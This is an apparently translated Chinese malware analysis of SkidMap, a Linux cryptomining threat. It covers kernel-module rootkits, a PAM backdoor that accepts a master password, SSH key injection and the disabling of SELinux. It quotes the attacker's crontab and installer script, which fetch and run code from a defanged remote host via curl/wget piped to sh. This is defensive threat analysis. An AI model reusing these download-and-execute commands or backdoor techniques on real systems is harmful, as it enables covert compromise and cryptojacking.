如何進行Linux惡意軟件SkidMap分析

挖掘加密貨幣惡意軟件仍然是一個普遍的威脅。網絡罪犯也越來越多地探索新的平臺和方法來進一步利用挖礦惡意軟件——從移動設備、unix和類unix系統到服務器和云環境。

攻擊者不斷提升惡意軟件抵御檢測的能力。例如，將惡意軟件與看門狗組件捆綁在一起，以確保非法的加密貨幣挖掘活動在受感染的機器中持續存在，或者基于linux的系統，利用基于LD_PRELOAD-based的rootkit使其組件無法被系統檢測到。

最近發現了一個叫做SkidMap的Linux惡意軟件，它展示了加密貨幣挖掘威脅越來越復雜的趨勢。該惡意軟件引起了人們的關注，原因在于它以一種加載惡意內核模塊的方式進行操作，從而不容易被察覺。

與用戶模式的rootkit相比，這些內核模式的rootkit不僅更難檢測，攻擊者還可以使用它們獲得對受影響系統的訪問權限。Skidmap能夠設置一個主密碼，使其能夠訪問系統中的所有用戶帳戶。SkidMap的許多例程都需要根訪問，SkidMap使用的攻擊向量（無論是通過漏洞攻擊、錯誤配置）很可能與向攻擊者提供對系統的根訪問或管理訪問的攻擊向量相同。

Skidmap感染鏈

惡意軟件通過crontab將自身安裝到目標計算機上，如下所示：

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

然后，安裝腳本pm.sh下載主二進制文件“pc”：

if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then    wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then    curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then    get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then    cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else    url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi  

執行“PC”二進制文件后，將更改削弱受影響機器的安全設置。當文件/usr/sbin/setenforce存在時，惡意軟件可以使用命令setenforce 0進行執行。如果系統有/etc/selinux/config文件，它會將這些命令寫入文件：selinux=disabled和selinux=targeted命令。第一種做法是禁用selinux策略或阻止其加載，第二種做法是將指定進程設為受限域中運行。

SkidMap還提供了后門，通過讓二進制文件將其處理程序的公鑰添加到authorized_keys文件來實現，該文件包含身份驗證所需的密鑰。

SkidMap提供了另一種攻擊者可以進入機器的方式，除了使用后門。惡意軟件用自己的惡意版本（檢測為backdoor.linux.pamdor.a）替換系統的pam_unix.so文件（負責標準unix身份驗證的模塊）。如圖2所示，此惡意pam_unix.so文件接受任何用戶的特定密碼，從而允許攻擊者以計算機中的任何用戶身份登錄。

SkidMap加密貨幣

“pc”二進制文件檢查受感染系統的操作系統是debian還是rhel/centos。

對于基于debian的系統，它將cryptocurrency miner的有效負載降到/tmp/miner2。對于centos/rhel系統，它將從url hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz下載一個tar文件，該文件包含cryptocurrency miner及其多個組件，然后將其解壓縮并安裝。

SkidMap其他惡意組件

惡意軟件組件旨在進一步混淆其惡意活動并確保它們繼續運行：

1、一個偽“rm”二進制文件：tar文件中包含的一個組件是一個偽“rm”二進制文件，它將替換原始的文件（rm通常用作刪除文件的命令）。此文件設置一個惡意cron作業，該作業將下載并執行一個文件。

安裝kaudited時，請將/usr/bin/kaudited文件安裝。多個可加載內核模塊（LKM）被安裝到受感染的計算機上的該二進制文件中。為了防止受感染的計算機在遭遇內核模式rootkits時崩潰，它會針對特定的內核版本使用不同的模塊。kaudited二進制文件還刪除了一個監視程序組件。

3、iproute，該模塊鉤住系統調用getdents（通常用于讀取目錄的內容）以隱藏特定的文件。

4、netlink，偽造網絡流量和cpu相關的統計，使受感染機器的CPU負載始終看起來很低。

解決方案

SkidMap使用相當先進的方法來確保它及其組件不被發現。SkidMap可以以多種方式訪問受影響的機器，從而重復感染已經被恢復或清除的系統。

挖掘加密貨幣不僅會影響服務器和工作站的性能，導致更高的開支，甚至還會干擾業務?？紤]到Linux在許多企業環境中的使用，用戶和管理員應保持系統和服務器的更新和修補；謹防未經驗證的第三方存儲庫；防止惡意文件或進程運行。

IoCs